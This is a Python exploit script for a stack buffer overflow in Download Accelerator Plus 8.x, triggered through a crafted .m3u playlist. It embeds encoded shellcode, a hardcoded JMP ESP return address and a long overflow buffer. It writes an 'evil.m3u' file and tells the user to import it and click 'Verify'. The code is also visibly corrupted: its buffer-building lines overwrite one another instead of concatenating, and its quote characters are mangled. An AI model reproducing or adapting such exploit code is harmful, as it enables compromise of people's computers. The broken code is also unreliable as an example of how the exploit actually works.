#!/usr/bin/python
# Download Accelerator Plus – DAP 8.x (m3u) 0day Local Buffer Overflow Exploit
# Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
# Tested on: Download Accelerator Plus 8.6 / XP SP2 Polish
# Shellcode: Windows Execute Command (calc)
# Just for fun ;]
##
from struct import pack
shellcode = (
"\\x6a\\x22\\x59\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x8d\\x6c\\xf6"
"\\xb2\\x83\\xeb\\xfc\\xe2\\xf4\\x71\\x84\\xb2\\xb2\\x8d\\x6c\\x7d\\xf7\\xb1\\xe7"
"\\x8a\\xb7\\xf5\\x6d\\x19\\x39\\xc2\\x74\\x7d\\xed\\xad\\x6d\\x1d\\xfb\\x06\\x58"
"\\x7d\\xb3\\x63\\x5d\\x36\\x2b\\x21\\xe8\\x36\\xc6\\x8a\\xad\\x3c\\xbf\\x8c\\xae"
"\\x1d\\x46\\xb6\\x38\\xd2\\xb6\\xf8\\x89\\x7d\\xed\\xa9\\x6d\\x1d\\xd4\\x06\\x60"
"\\xbd\\x39\\xd2\\x70\\xf7\\x59\\x06\\x70\\x7d\\xb3\\x66\\xe5\\xaa\\x96\\x89\\xaf"
"\\xc7\\x72\\xe9\\xe7\\xb6\\x82\\x08\\xac\\x8e\\xbe\\x06\\x2c\\xfa\\x39\\xfd\\x70"
"\\x5b\\x39\\xe5\\x64\\x1d\\xbb\\x06\\xec\\x46\\xb2\\x8d\\x6c\\x7d\\xda\\xb1\\x33"
"\\xc7\\x44\\xed\\x3a\\x7f\\x4a\\x0e\\xac\\x8d\\xe2\\xe5\\x9c\\x7c\\xb6\\xd2\\x04"
"\\x6e\\x4c\\x07\\x62\\xa1\\x4d\\x6a\\x0f\\x97\\xde\\xee\\x6c\\xf6\\xb2")
RET = 0x7CA58265 # JMP ESP (SHELL32.DLL / XP SP2 Polish)
m3u = \’http://localhost/verify_me________________________________%s.mp3\’
buf = \’A\’ * 14074
buf = pack(\'<L\’, RET)
buf = \’\\x90\’ * 32
buf = shellcode
m3u %= buf
fd = open(\’evil.m3u\’, \’wb\’)
fd.write(m3u)
fd.close()
print \’DONE, import the evil.m3u and click "Verify"\’
# EoF